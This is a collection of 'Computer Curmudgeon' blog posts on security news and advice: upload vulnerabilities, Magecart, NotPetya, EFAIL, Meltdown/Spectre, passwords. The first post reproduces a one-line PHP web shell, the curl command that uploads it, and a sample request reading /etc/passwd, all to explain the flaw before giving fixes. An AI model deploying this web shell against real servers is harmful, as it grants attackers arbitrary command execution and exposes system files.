
mdlbear: (technonerdmonster)

There’s an article about a security problem getting a bit of attention lately, Apache Access Vulnerability Could Affect Thousands of Applications. Sounds really scary. Here’s a better article about it, Zero-day in popular jQuery plugin actively exploited for at least three years. Looking at those titles you might think that the problem is either with a jQuery plugin, or Apache’s .htaccess files. It’s neither. The real situation is more complicated. You might think that if you’re not using this plugin on your website, you’d be safe. You’d be wrong. You might think that patching the plugin, or the Apache web server, would solve the problem. You’d be wrong about that, too. The real problem is still there, waiting to bite you in the tail. If you don’t have a website, or don’t allow file uploads, you can stop reading now unless you’re curious. If you do, stick around (or jump to the last section if all you want is the fix).

The problem being reported

You may have noticed that the two titles up there are highlighting different aspects of the problem. There’s that “popular jQuery plugin”, blueimp/jQuery-File-Upload. People building websites use it to allow their users to upload files (e.g., cat pictures). It’s really popular – 7,800 forks on GitHub, 29,000 stars; probably tens or hundreds of thousands of sites using it. And then there’s the Apache web server. Apache is even more popular – it runs some 45% of the web, and there are presently just short of two billion websites (although only a couple of hundred million of those are currently active). And, more specifically, there are .htaccess files, which are used to override certain server configuration options (including security options, which is almost as scary as it sounds, but doesn’t have to be).

The specific problem is this: jQuery-File-Upload lets visitors to a web site upload their cat pictures. These get put in a directory somewhere in the server’s file system. If you’re running a website and have any sense, you’ll put that directory someplace where it can’t be seen from the web, but of course that means that your visitors can’t see the cat pictures they’ve uploaded, without you or your software doing some work, and that could be tricky.

If you have a directory that’s part of your website that you want to be invisible from the web, or visible safely (we’ll get into that a little later), there are two ways to set that up. If you have access to Apache’s configuration files, you do it there. Unfortunately that requires root access, and most of us are using shared servers and our hosting sites don’t allow that, because it would be a huge security hole if they did. The other way of configuring your site is to put a file called .htaccess somewhere on your site, and it will apply configuration overrides to that directory and everything below it. That’s a little dicey, because it’s possible to get that wrong, especially if you’re not an experienced system administrator, but if you’re operating a shared hosting service like the one I use, you have to give your users some way of setting parameters, and .htaccess is the only game in town.
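For example, a minimal .htaccess that makes a directory (and everything under it) invisible from the web might look like this – assuming Apache 2.4 or later; older versions spelled it with "Order deny,allow" and "Deny from all":

```apache
# Deny all web access to this directory and its subdirectories.
# (Apache 2.4+ syntax. This only takes effect if the server's main
# configuration actually allows .htaccess overrides here.)
Require all denied
```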

Finally there’s the fact that, some ten years ago, Apache changed the defaults on their server so that .htaccess files are disabled, so the administrator has to specifically re-enable them. What does that mean?

Well, if you are allowing users to upload files, and if you put the upload directory where it can be seen from the web (meaning that people can download from it), and if you were counting on a .htaccess file to protect that directory, and if you upgraded Apache any time in the last ten years, and if you or your system administrator didn’t re-enable .htaccess files, and if you thought that your .htaccess file was still protecting you, then you have a problem. That’s a lot of “if”s, but there are an awful lot of websites.
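For reference, the change in question was to the default value of Apache’s AllowOverride directive, which became None in version 2.3.9. Re-enabling .htaccess processing takes an explicit stanza in the main server configuration – a sketch, with an assumed path:

```apache
<Directory "/var/www/html">
    # The default since Apache 2.3.9 is "AllowOverride None", which
    # makes the server ignore .htaccess files entirely in this tree.
    # Re-enable them explicitly:
    AllowOverride All
</Directory>
```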

Here’s how this situation can be exploited, as reported by a security researcher at Akamai named Larry Cashdollar, in an article titled Having The Security Rug Pulled Out From Under You.

If you can upload files to a website, all you have to do is:

$ echo '<?php $cmd=$_GET["cmd"]; system($cmd); ?>' > shell.php
$ curl -F "files=@shell.php" http://example.com/jQuery-File-Upload-9.22.0/server/php/index.php

It’s not hard. The first line there creates a one-line file with some PHP code in it. The second line uploads it. Now you have a file called shell.php on the server. You can send a request for that file with a query string attached to it, and PHP will helpfully pass that string to system(), which runs it as a shell command. Boom.
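To make the last step concrete, here is a sketch of the follow-up request. The host and path are made up, and the local printf just re-creates the uploaded file to show what the server now executes:

```shell
# The uploaded file is one line of PHP that runs whatever it's handed.
# (Writing it locally here just to show its contents.)
printf '%s\n' '<?php $cmd=$_GET["cmd"]; system($cmd); ?>' > shell.php
cat shell.php
rm shell.php

# Once it's on the server, the attacker runs arbitrary commands by
# putting them in the query string of an ordinary GET request:
#   curl 'http://example.com/uploads/shell.php?cmd=cat+/etc/passwd'
# PHP decodes the "cmd" parameter and hands it straight to the shell.
```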

The problem with the reporting

Here are a couple of passages quoted from the ZDNet article:

The developer’s investigation identified the true source of the vulnerability not in the plugin’s code, but in a change made in the Apache Web Server project dating back to 2010, which indirectly affected the plugin’s expected behavior on Apache servers.

Starting with [version 2.3.9], the Apache HTTPD server got an option that would allow server owners to ignore custom security settings made to individual folders via .htaccess files. This setting was made for security reasons, and was enabled by default.

Actually, what happened was that the server disabled .htaccess files by default, and it was done for performance reasons – having to read .htaccess files with every request is a big performance hit. Here’s what the Apache documentation says about it:

.htaccess files should be used in a case where the content providers need to make configuration changes to the server on a per-directory basis, but do not have root access on the server system. In the event that the server administrator is not willing to make frequent configuration changes, it might be desirable to permit individual users to make these changes in .htaccess files for themselves. This is particularly true, for example, in cases where ISPs are hosting multiple user sites on a single machine, and want their users to be able to alter their configuration. [emphasis mine]

The DARKReading article adds:

A security vulnerability is born, Cashdollar said, when a developer looks at very old documentation and uses .htaccess for authentication instead of one of the methods now suggested by the Apache Foundation.

Well, no. The documentation is still current, and it’s very clearly marked as something you shouldn’t use unless you have to. And most of the people who have vulnerable websites aren’t developers, don’t have any choice about whether to use .htaccess, and aren’t reading the docs. They’re just doing cut-and-paste from the quick-start documents that their web host provides.

What’s the real problem?

There are a couple of things that the articles I’ve referred to didn’t mention, or just glossed over.

The first is that uploading files is a problem, and it’s been a problem since long before there was a World Wide Web! I first ran into this while running an FTP server. There are all sorts of ways file uploads can be abused. Somebody can bring down your server by uploading junk and filling your disk. They can upload malware. It has nothing at all to do with jQuery-File-Upload; this has been a problem since day 1.

The solution, if you must allow uploads, is to upload them to someplace safely outside of your website, and process them immediately – either with your server-side code, or with a cron job. This is just as much common sense as not using any form data until it’s been validated and sanitized. Some languages, like Perl, give you some help with this. The same applies on the client side, if you’re using JavaScript. Validate your inputs! I ran into that one last week, you may remember.
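A minimal sketch of that pattern in shell, suitable for running from cron; the directory names are made up, and the safety check is only a placeholder:

```shell
#!/bin/sh
# publish_uploads: move files from a staging directory (outside the web
# root) into a public one, but only if they pass a placeholder check.
publish_uploads() {
    staging="$1"   # e.g. /var/uploads/incoming -- NOT visible from the web
    public="$2"    # e.g. /var/www/html/cats    -- visible from the web
    for f in "$staging"/*; do
        [ -f "$f" ] || continue
        # Placeholder check: publish only plain image files; anything
        # else (like a stray shell.php) stays quarantined in staging.
        case "$(file -b --mime-type "$f")" in
            image/jpeg|image/png|image/gif) mv "$f" "$public"/ ;;
            *) echo "rejected: $f" ;;
        esac
    done
}
```

Run it from cron every few minutes, or call it from the code that handles the upload; either way, nothing the web server can reach is ever unreviewed.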

The second problem is PHP. Actually, the problem is putting executable files in among your website’s documents instead of someplace safe like a CGI script directory, or behind a separate application server. But PHP is the biggest offender. It was designed to make it so easy to build a website that anyone could do it. And everyone did.

PHP was designed to be simple. It wasn’t designed to be safe. (It has a lot of other problems, too, but that’s the big one.) See Why PHP Sucks and PHP: a fractal of bad design, for example.

The biggest problem with PHP is that it works by mixing executable code with the documents you’re serving to the user. Sure, it’s convenient. It’s also bad design – it’s a series of disasters waiting to happen, and this is only the most recent one.

What should you do?

  • Obviously, if you have access to your server’s configuration, you should disable .htaccess and do everything at the server level. That’s not always possible.
  • If you aren’t using PHP on your website, disable it.
  • At the very least, disable PHP in your upload directory!
  • If you want to let users upload files, put them someplace outside your document root and keep them there until you or your software can review them for safety. (When I was running an FTP server, I had separate ‘incoming’ and ‘outgoing’ directories.)

You may find Disable PHP in a directory with Apache .htaccess - Electric Toolbox helpful: just put these three lines into an .htaccess file, either at the top level of your site, or in any directories where PHP isn’t needed (which includes not only your upload directory but also image directories and other assets, just to be sure).

RemoveHandler .php .phtml .php3
RemoveType .php .phtml .php3
php_flag engine off

While you’re at it, make it so that the web server – and anyone else who isn’t you – can’t write into your website files:

cd your_server's_document_root
chmod -R go-w .

Have fun, be safe out there, and don’t use PHP.

Another fine post from The Computer Curmudgeon.

mdlbear: (technonerdmonster)

TL;DR: if you bought anything from Newegg between August 14th and September 18th, call your bank and get a new credit card. You can find more details in these articles: NewEgg cracked in breach, hosted card-stealing code within its own checkout | Ars Technica // Hackers stole customer credit cards in Newegg data breach | TechCrunch // Magecart Strikes Again: Newegg in the Crosshairs | Volexity // Another Victim of the Magecart Assault Emerges: Newegg

The credit-card skimming attack appears to have been done by Magecart, the organization behind earlier attacks on British Airways and Ticketmaster. If you are one of the customers victimized by one of these attacks, it's not your fault, and there isn't much you could have done to protect yourself (but read on for some tips). Sorry about that.

This article, Compromised E-commerce Sites Lead to "Magecart", gives some useful advice. (It's way at the end, of course; search for "Conclusion and Guidance".) The most relevant for users is

An effective control that can prevent attacks such as Magecart is the use of web content whitelisting plugins such as NoScript (for Mozilla’s Firefox). These types of add-ons function by allowing the end user to specify which websites are “trusted” and prevents the execution of scripts and other high-risk web content. Using such a tool, the malicious sites hosting the credit card stealer scripts would not be loaded by the browser, preventing the script logic from accessing payment card details.

Note that I haven't tried NoScript myself -- yet. I'll give you a review when I do. They also advise selecting your online retailers carefully, but I'm not sure I'd consider, say, British Airways to be all that dubious. (Ticketmaster is another matter.)

Impacts of a Hack on a Magento Ecommerce Website, which talks about an attack on a site using the very popular Magento platform, gives some additional advice:

Shy away from sites that require entering payment details on their own page. Instead prefer the websites that send you to a payment organization (PayPal, payment gateway, bank, etc) to complete the purchase. These payment organizations are required to have very strict security policies on their websites, with regular assessments, so they are less likely to be hacked or miss some unauthorized modifications in their backend code.

They also suggest checking to see whether the website has had recent security issues, and using credit cards with additional levels of authentication (e.g. 2FA -- two-factor authentication).


Things are more difficult for retailers, but the best advice (from this article, again) is

Stay away from processing payment details on your site. If your site never has access to clients’ payment details, it can’t be used to steal them even if it is hacked. Just outsource payments to some trusted third-party service as PayPal, Stripe, Google Wallet, Authorize.net, etc.

Which is the flip side of what they recommend for shoppers. If the credit card info isn't collected on your site, you're not completely safe, but it avoids many of the problems, including Magecart. Keep your site patched anyway.

If you insist on taking payment info on your own site, and even if you don't, the high-order bit is this paragraph:

E-commerce site administrators must ensure familiarity and conformance to recommended security controls and best practices related to e-commerce, and particularly, the software packages utilized. All operating system software and web stack software must be kept up to date. It is critical to remain abreast of security advisories from the software developers and to ensure that appropriate patch application follows, not only for the core package but also third-party plugins and related components. [emphasis mine]

Be careful out there!

Another fine post from The Computer Curmudgeon, cross-posted to computer-curmudgeon.com.

mdlbear: (technonerdmonster)

Actually two PSAs.

First: Especially if you're running Windows, you ought to go read The Untold Story of NotPetya, the Most Devastating Cyberattack in History | WIRED. It's the story of how a worldwide shipping company was taken out as collateral damage in the ongoing cyberwar between Russia and the Ukraine. Three takeaways:

  1. If you're running Windows, keep your patches up to date.
  2. If you're running a version of Windows that's no longer supported (which means that you can't keep it patched, by definition), either never under any circumstances connect that box to a network, or wipe it and install an OS that's supported.
  3. If at all possible, keep encrypted offline backups of anything really important. (I'm not doing that at the moment either. I need to fix that.) If you're not a corporation and not using cryptocurrency, cloud backups encrypted on the client side are probably good enough.

Second: I don't really expect that any of you out there are running an onion service. (If you had to click on that link to find out what it is, you're not.) But just in case you are, you need to read Public IP Addresses of Tor Sites Exposed via SSL Certificates, and make sure that the web server for your service is listening on 127.0.0.1 (localhost) and not on 0.0.0.0 or *. That's the way the instructions (at the "onion service" link above) say to set it up, but some people are lazy. Or think they can get away with putting a public website on the same box. They can't.
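In Apache terms, the whole difference is one line in the server configuration (the port number is just an example; nginx's listen directive works the same way):

```apache
# Safe: the server only accepts connections from the local machine,
# so the only way in is through the Tor daemon on the same box.
Listen 127.0.0.1:8080

# Unsafe: listening on every interface exposes the service's public
# IP address -- and, via its SSL certificate, its identity.
# Listen 0.0.0.0:8080
```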

If you're curious and baffled by all of the above, Tor (The Onion Router) is a system for wrapping data packets on the internet in multiple layers of encryption and passing them through multiple intermediaries between you and whatever web site you're connecting with. This will protect both your identity and your information as long as you're careful! An onion service is a web server that's only reachable via Tor.

Onion services are part of what's sometimes called "the dark web".

Be safe! The network isn't the warm, fuzzy, safe space it was in the 20th Century.

Another public service announcement from The Computer Curmudgeon.

mdlbear: (wtf-logo)

If you're using the popular social/money-transfer phone app Venmo check your privacy settings!! It seems that the default is that every transaction you make is public! It is difficult for me to express just how broken this is. In case you're having trouble grasping the implications, just go to PUBLIC BY DEFAULT - Venmo Stories of 2017. There you will find profiles of five unsuspecting Venmo users -- one of them is a cannabis retailer -- whose transactions were among the over two hundred thousand exposed to public view during 2017.

The site is a project of Mozilla Media Fellow Hang Do Thi Duc. She has some other interesting things on her site.

It's worth noting that Venmo is owned by PayPal, and that according to a PayPal spokesperson quoted in this article on Gizmodo the public-by-default nature of person-to-person transfers (person-to-business transactions are private) is apparently a deliberate feature, not a bug.

“Venmo was designed for sharing experiences with your friends in today’s social world, and the newsfeed has always been a big part of this,” a company spokesperson told Gizmodo, asserting that the “safety and privacy” of its users is a “top priority.”

Yeah. Right.

Here are more articles at The Guardian, Lifehacker, and CNET.

"We make it default because it's fun to share [information] with friends in the social world," a Venmo representative told CNET Friday. "[We've seen that] people open up Venmo to see what their family and friends are up to."

Because it's fun. Kind of puts it in the same category as other "fun" things like cocaine, binge drinking, and unprotected sex, doesn't it?

This has been a public service announcement from The Computer Curmudgeon. With a tip of the hat to Thnidu.

efail

2018-05-15 07:41 am
mdlbear: (technonerdmonster)

If your mail client automatically decrypts mail, read this!

There's no need to panic, but you should immediately disable and/or uninstall plugins that automatically decrypt PGP-encrypted or S/MIME email. The linked article tells you how.

The vulnerability is called EFAIL (the obligatory website with clever name), and allows an attacker to read your encrypted email, in effect "over your shoulder", by sending you a modified version of the encrypted message. They can do this by eavesdropping, compromising an email account or server, etc. The attack is based on the way active content, such as images, is handled in HTML email.

Short term: No decryption in email client. The best way to prevent EFAIL attacks is to only decrypt S/MIME or PGP emails in a separate application outside of your email client. Start by removing your S/MIME and PGP private keys from your email client, then decrypt incoming encrypted emails by copy&pasting the ciphertext into a separate application that does the decryption for you. That way, the email clients cannot open exfiltration channels. This is currently the safest option with the downside that the process gets more involved.

Short term: Disable HTML rendering. The EFAIL attacks abuse active content, mostly in the form of HTML images, styles, etc. Disabling the presentation of incoming HTML emails in your email client will close the most prominent way of attacking EFAIL. Note that there are other possible backchannels in email clients which are not related to HTML but these are more difficult to exploit.

Links below:

  • EFAIL Paper [PDF]
  • Critical PGP and S/MIME bugs can reveal encrypted emails—uninstall now [Updated]
  • Attention PGP Users: New Vulnerabilities Require You To Take Action Now | EFF
  • Not So Pretty: What You Need to Know About E-Fail and the PGP Flaw | EFF

This has been a public service announcement from The Computer Curmudgeon.

mdlbear: the positively imaginary half of a cubic mandelbrot set (Default)

TL;DR: Patch your computer NOW! (Or as soon as you can, if you're running Windows or Ubuntu and reading this on Monday -- the official release date for this information was supposed to have been Tuesday January 9th.)

Unless you've been hiding under a rock all weekend, you probably know that Meltdown and Spectre have nothing to do with either nuclear powerplants or shady investments: they are, instead, recently-revealed, dangerous design flaws in almost all recent computers. Meltdown affects primarily Intel processors (i.e. most desktops, laptops, and servers), and will be mitigated (Don't you just love that word? It doesn't mean "fixed", it means "made less severe". That's accurate.) by the recent patches to Linux, Windows, and MacOS. Spectre is harder to exploit, but also harder to fix, and may well present serious problems going forward.

But what the heck are they? I'm going to try to explain that in terms a non-geek can understand. Geeks can find the rest of the details in the links, if they haven't already chased them down themselves. (And if you're in software or IT and you haven't, you haven't been paying attention.)

Briefly, these bugs are hardware design problems that allow programs to get at information belonging to other programs. In the case of Meltdown, the other program is the operating system; with Spectre, it's other application programs. The information at risk includes things like passwords, credit card and bank account numbers, and cryptographic keys. Scared yet?

Basically, it all comes down to something called "speculative execution", which means something like "getting stuff done ahead of time just in case it's needed." And carefully putting things back the way they were if it turned out you didn't. That's where it gets tricky.

Modern computers are superscalar, which means that they achieve a lot of their impressive speed by doing more than one operation at once, and playing fast-and-loose with the order they do them in when it doesn't matter. Sometimes they make tests (like, "is this number greater than zero?", or "is that a location the program doesn't have permission to read?"), and do something different depending on the result. That's called a "branch", because the program can take either of two paths.

But if the computer is merrily going along executing instructions before it needs their results, it doesn't know which path to take. So, in the case of Spectre, it speculates that it's going to be the same path as last time. If it guesses wrong (and Spectre makes sure that it will by going down the safe path first), the computer will get an instruction or two down the wrong path before it has to turn back and throw away any results it got. Spectre makes it do something with those results that leaves a trace.

In the case of Meltdown, the test that's going down the wrong path is to see whether the program is trying to read from memory that belongs to the operating system kernel -- that's the part of the OS that's always there, managing resources like memory and files, creating and scheduling processes, and keeping programs from getting into places where they aren't permitted. (There's a lot of information in the kernel's memory, including personal data and passwords; for this discussion you just need to know that leaking it would be BAD.) When this happens, the memory-management hardware interrupts the program before it receives its ill-gotten data; normally the result is that the program is killed. End of story. On Intel processors, though, there's a way the program can say something like "if this instruction causes an interrupt, just pretend it never happened." The illegally-loaded data is, of course, thrown away.

Meltdown works because the operating system's memory is -- or was -- part of the same "address space" as the application program. The application can try to read the kernel's memory; it just gets stopped if it tries. After Tuesday's patch, the two address spaces are going to be completely separate, so the program can't even try -- the kernel's address space simply isn't there. (There's a performance hit, because switching between the two address spaces takes time -- that's why they were together in the first place.)

At this point you know what Spectre and Meltdown do, but you may be wondering how they manage to look at data that simply isn't there any more, because the instruction that loaded it was canceled. (If you're not wondering that, you can stop here.) The key is in the phrase "any more". During the brief time when the data is there, the attacker can do something with it that can still be detected later. The simplest way is by warming the cache.

Suppose you go out to your car on an icy morning and the hood feels warm. Maybe one of the local hoodlums took it out for a joyride, or maybe one of the neighbor's cows was sitting on it. You can tell which it was by starting the engine and seeing whether it's already warmed up. (We're assuming that the cow doesn't know how to hotwire a car.) The attack program does almost the same thing.

The computer's CPU (Central Processing Unit) chip is really fast. It can execute an instruction in less than a nanosecond. Memory, on the other hand, is comparatively slow, in part because it's not part of the CPU chip -- electrical signals travel at pretty close to the speed of light, which is roughly a foot per nanosecond. There's also some additional hardware in the way (including the protection stuff that Meltdown is sneaking past), which slows things down even further. We can get into page tables another time.

The solution is for the CPU to load more memory than it needs and stash (or cache) it away in very fast memory that it can get to quickly, on the very sensible grounds that if it needs something from location X now, it's probably going to want the data at X+1 or somewhere else in the neighborhood pretty soon. The cache is divided into chunks called "lines" that are all loaded into the cache together. (Main memory is divided into "pages", but as I mentioned in the previous paragraph that's another story.)

When it starts a load operation, the first thing the CPU does is check to see whether the data it's loading is in the cache. If it is, that's great. Otherwise the computer has to go load it and the other bytes in the cache line from wherever it is in main memory, "warming up" the cache line in the process so that the next access will be fast. (If it turns out not to be anyplace the program has access to, we get the kind of "illegal access exception" that Meltdown takes advantage of.)
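You can see the same effect, loosely, without touching CPU caches at all: the operating system keeps its own cache of recently-read files in memory, so reading a file that's already cached is much faster than reading it from disk. A sketch (the file name is arbitrary, and dd's throughput report serves as the stopwatch):

```shell
# Crude analogy using the OS's page cache instead of the CPU's cache.
dd if=/dev/zero of=cache-demo.tmp bs=1M count=64 2>/dev/null
# Writing the file just warmed the OS cache, so this read is fast --
# watch the MB/s figure dd prints:
dd if=cache-demo.tmp of=/dev/null bs=1M
# For a genuinely cold (slow) read you would have to evict the file
# first -- on Linux, as root:  sync && echo 3 > /proc/sys/vm/drop_caches
rm cache-demo.tmp
```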

The point is, it takes a lot longer to load data if it's not in the cache. If one of the instructions that got thrown away loaded data that wasn't in the cache, that cache line will still be warm and it will take less time to load data from it. So one thing the attack program can do is to look at a bit in the data it's not supposed to see, and if it's a "1", load something that it knows isn't in the cache. That takes only two short instructions, so it can easily sneak in and get pre-executed.

Then, the attack program measures how long it takes to load data from that cache line again. (One of the mitigations for the Spectre attack is to keep JavaScript programs -- which might come from anywhere, and shouldn't be able to read your browser's stored passwords and cookies -- from getting at the high-resolution timers that would let them measure load time.)

Here under the cut are a basic set of references, should you wish to look further. Good stuff to read while your patches are loading.

Notes & links

mdlbear: "Sometimes it's better to light a flamethrower than to curse the darkness" - Terry Pratchett (flamethrower)

Advisory 01/2014: Drupal - pre Auth SQL Injection Vulnerability

A "highly critical public service announcement" from Drupal [LWN.net] "Automated attacks began compromising Drupal 7 websites that were not patched or updated to Drupal 7.32 within hours of the announcement of SA-CORE-2014-005 - Drupal core - SQL injection. You should proceed under the assumption that every Drupal 7 website was compromised unless updated or patched before Oct 15th, 11pm UTC, that is 7 hours after the announcement."

Impressive. I think this is an appropriate place to quote one of my father's aphorisms: "A locked car with an open window is NOT a locked car."

If PHP is your open window, you may as well leave the keys on the dashboard where they're easy to see.

mdlbear: the positively imaginary half of a cubic mandelbrot set (Default)

A very productive couple of days at work; I hit my (largely symbolic) code freeze deadline yesterday evening at 5pm, in spite of having spent far too much time in meetings. There's another, very hard, very real handover deadline coming up on Monday -- I'll be spending the rest of the week documenting and testing.

I walked a little yesterday, and a full three miles on Monday. I was actually present in the moment for much of Monday's walk, and noticed that it felt better than when I spend the time worrying or beating myself up over things I should have done years ago. Not that there isn't plenty of time for that.

I also finished the data-entry for taxes, ran my summary program (which sorts the expenses into categories that are easy for me to put into the forms), and imported last year's data into The Program Formerly Known As TaxCut (henceforth probably TPFKATC).

One of the most annoying things about modern GUI software is that it has no notion of "current directory" even if you start it from a command line in the damned directory; it thinks that you want to put everything in "Documents" or some-such, and often won't even do you the courtesy of exporting into the same directory you saved the document into. Sometimes that's useful, e.g. if you're working on only one project at a time and all your exported .wav files (to give a current example) go into the same directory. If you jump around between projects it's annoying as heck.

I've been reading How To Be Happy, available for free on 17000 Days. There's a section on optimism, which had a different definition from the one I'm used to; you'll also find it in this post. I've always said that I'm a pessimist because I like pleasant surprises. But I've never much liked surprises of any kind, and I'm obviously not expecting any pleasant ones. The definition in the book is:

The biggest difference between optimists and pessimists is that optimists assume good things are permanent and pervade every area of their lives, but assume bad things are temporary and isolated to their limited context.

Pessimists, obviously, assume the opposite. So I'm a pessimist because I expect anything pleasant to be a surprise -- unplanned, unlikely, and temporary. It makes a difference.

As for links, there were several good ones, mostly about computer security. State of Texas exposes data on 3.5 million people is one -- the money quote is:

Often when I am talking with people at shows and seminars I ask them if they have an encryption program in place. Nearly always the answer is "Of course! We have deployed encryption to over 80% of our laptops already."

I then ask about the servers, databases and other critical storage locations of sensitive data and I see a scary look in their eyes... They usually respond with "Oh, that's OK, that information is all inside of our firewall."

Yeah, right.

The other one, Security researcher warns over Dropbox authentication security flaw, is kind of obvious. I mean, if you set up automatic syncing with someplace on the net, it's obvious that your credentials are going to be stored on your local machine, and can be exposed if your account is compromised. Duh.

mdlbear: (borg)

Google uses an unreliable bot to determine what documents are "appropriate" to share.

Yeah, I have my websites on a hosting service. But I have the master copy at home.

mdlbear: the positively imaginary half of a cubic mandelbrot set (Default)
Schneier on Security: Choosing Secure Passwords
Ever since I wrote about the 34,000 MySpace passwords I analyzed, people have been asking how to choose secure passwords.

My piece aside, there's been a lot written on this topic over the years -- both serious and humorous -- but most of it seems to be based on anecdotal suggestions rather than actual analytic evidence. What follows is some serious advice.

The attack I'm evaluating against is an offline password-guessing attack. This attack assumes that the attacker either has a copy of your encrypted document, or a server's encrypted password file, and can try passwords as fast as he can. There are instances where this attack doesn't make sense. ATM cards, for example, are secure even though they only have a four-digit PIN, because you can't do offline password guessing. And the police are more likely to get a warrant for your Hotmail account than to bother trying to crack your e-mail password. Your encryption program's key-escrow system is almost certainly more vulnerable than your password, as is any "secret question" you've set up in case you forget your password.

Offline password guessers have gotten both fast and smart. AccessData sells Password Recovery Toolkit, or PRTK. Depending on the software it's attacking, PRTK can test up to hundreds of thousands of passwords per second, and it tests more common passwords sooner than obscure ones.

So the security of your password depends on two things: any details of the software that slow down password guessing, and in what order programs like PRTK guess different passwords.
Don't recall where I found the link for this one; probably Don Marti. Good advice in any case.
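Schneier's two factors -- per-guess cost, and the order in which a cracker tries candidates -- are easy to see in a toy offline attack. This is strictly a sketch of the idea (the five-word list and the single unsalted SHA-256 hash are my simplifications; real tools like PRTK are vastly smarter and faster):

```python
import hashlib

def sha256(pw):
    return hashlib.sha256(pw.encode()).hexdigest()

# Candidates in rough popularity order: common passwords get tried first.
WORDLIST = ["password", "password1", "abc123", "myspace1", "letmein"]

def crack(target_hash, wordlist):
    """Return (guess_count, password) on a hit, or None if the list is exhausted."""
    for n, candidate in enumerate(wordlist, start=1):
        if sha256(candidate) == target_hash:
            return n, candidate
    return None

# A popular password falls on the second guess...
assert crack(sha256("password1"), WORDLIST) == (2, "password1")
# ...while a long, obscure passphrase survives the whole list.
assert crack(sha256("correct horse battery staple"), WORDLIST) is None
```

The defender's half of the same equation is the first of Schneier's two things: a deliberately slow, salted hash (bcrypt, scrypt) cuts "hundreds of thousands of passwords per second" down by orders of magnitude, whatever the guessing order.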
mdlbear: the positively imaginary half of a cubic mandelbrot set (Default)
E-passport: E-Passports Can Be Hacked and Cloned in Minutes
Tests conducted for the UK's Times Online have concluded that the new high-tech e-passports being distributed around the world can be hacked and cloned within minutes. A computer researcher proved it by cloning the chips in two British passports and then implanting digital images of Osama bin Laden and a suicide bomber. Both passports passed as genuine by UN approved passport reader software. The entire process took less than an hour.
mdlbear: (hacker glider)

Security is like sex. Once you're penetrated you're ****ed.

(From this comment on a slashdot post titled "Mac OS X Root Escalation Through AppleScript". Punctuation unchanged from the original.)

mdlbear: (kill bill)

It isn't (Seattle Times)

Microsoft has developed a small plug-in device that investigators can use to quickly extract forensic data from computers that may have been used in crimes.

The COFEE, which stands for Computer Online Forensic Evidence Extractor, is a USB "thumb drive" that was quietly distributed to a handful of law-enforcement agencies last June. Microsoft General Counsel Brad Smith described its use to the 350 law-enforcement experts attending a company conference Monday.

The device contains 150 commands that can dramatically cut the time it takes to gather digital evidence, which is becoming more important in real-world crime, as well as cybercrime. It can decrypt passwords and analyze a computer's Internet activity, as well as data stored in the computer.

It also eliminates the need to seize a computer itself, which typically involves disconnecting from a network, turning off the power and potentially losing data. Instead, the investigator can scan for evidence on site.

More than 2,000 officers in 15 countries, including Poland, the Philippines, Germany, New Zealand and the United States, are using the device, which Microsoft provides free.

Not surprisingly, there is discussion on slashdot and techdirt. Fortunately, an easy-to-install upgrade has just been released that fixes the problem.

mdlbear: (hacker glider)
... encrypted PDFs at 11.

Bruce Schneier's Security Matters: Prediction -- RSA Conference Will Shrink Like a Punctured Balloon
For a while now I have predicted the death of the security industry. Not the death of information security as a vital requirement, of course, but the death of the end-user security industry that gathers at the RSA Conference. When something becomes infrastructure -- power, water, cleaning service, tax preparation -- customers care less about details and more about results. Technological innovations become something the infrastructure providers pay attention to, and they package it for their customers.

No one wants to buy security. They want to buy something truly useful -- database management systems, Web 2.0 collaboration tools, a company-wide network -- and they want it to be secure. They don't want to have to become IT security experts. They don't want to have to go to the RSA Conference. This is the future of IT security.

You can see it in the large IT outsourcing contracts that companies are signing -- not security outsourcing contracts, but more general IT contracts that include security. You can see it in the current wave of industry consolidation: not large security companies buying small security companies, but non-security companies buying security companies. And you can see it in the new popularity of software as a service: Customers want solutions; who cares about the details?
... unless they're Microsoft customers, of course. (from techdirt)
mdlbear: (xo)
... not to mention the XO, which hasn't told me its official name yet. Right now it's just going by "steve", which is the name I gave it when I first booted it. I think that, with a reasonable window manager on it instead of the kid-oriented Sugar, it will probably be fine. Or maybe with Debian -- I've been noticing lots of ways in which Fedora's package manager sucks compared to apt.

The biggest problem so far is that it seems to use control-O -- even when you're in terminal mode and ssh'ed to a machine running emacs -- to open the journal application. This is Not A Good Thing when your favorite LJ and mail clients are emacs modes. I've been reluctant to find out what other potentially-vital keystrokes it eats.

On the other hand, my scheme to carry a basically naked machine across the border and pull in my keys from an encrypted tarball from home worked perfectly. Actually I didn't bother encrypting my ssh identity because it's *already* encrypted with a good passphrase. And the tarball's been deleted by now; I only needed it for a day.

Note to self: if we're going to play this game on a regular basis, the travel keyboard and mouse are essential. I currently have the XO's screen flipped around (halfway to tablet mode) so I can use my Thinkpad keyboard and a travel mouse. Works great.
mdlbear: (distress)

Good post on privacy vs. security, with reference links, posted by [livejournal.com profile] alobar. Via [livejournal.com profile] meglimir.

In a Jan. 21 "New Yorker" article, Director of National Intelligence Michael McConnell discusses a proposed plan to monitor all -- that's right, *all* -- Internet communications for security purposes, an idea so extreme that the word "Orwellian" feels too mild.

This is really just a matter of formalizing what's been widely suspected for years: that the NSA has been monitoring all the phone and Internet communications it can get to.

"The land of the free and the home of the brave..."

Yeah, right. Try this version.

Security?

2008-01-16 03:42 pm
mdlbear: (distress)
Techdirt: TSA Staffer Hires Buddies To Build Insecure Website For Folks Falsely On Watch List
We've had so many stories of government computer systems or websites that have terrible security or are just useless (but expensive!) that it shouldn't surprise us to hear of another one. Yet, there's always someone who can go a step further. Witness the news that the TSA's website for individuals who find themselves incorrectly on the security watchlist has been found to be insecure, with hundreds of falsely accused travelers exposing personal details by using the site. Even better, it turns out that the company that was hired to build the site got the job in a no-bid contract (meaning there wasn't any competition -- it was just chosen) and the guy responsible for figuring out who to hire just so happened to have been a former employee at that company. So, basically, what happened was that a guy who had taken a job at the TSA hired his former coworkers, with no competition for the job and apparently little oversight, to just build a website that turned out to be insecure. And, of course, without any oversight, it took months before anyone even noticed the site was insecure. And, remember, that this is the TSA we're talking about here -- an organization who's main concern is supposed to be security. I feel safer already.
Why am I not surprised by this? The original article is on InformationWeek.

Do you feel safer?
mdlbear: (hacker glider)
Security expert Bruce Schneier, in a Wired article titled Steal This Wi-Fi, writes
Whenever I talk or write about my own security setup, the one thing that surprises people -- and attracts the most criticism -- is the fact that I run an open wireless network at home. There's no password. There's no encryption. Anyone with wireless capability who can see my network can use it to access the internet.

To me, it's basic politeness. Providing internet access to guests is kind of like providing heat and electricity, or a hot cup of tea. But to some observers, it's both wrong and dangerous.
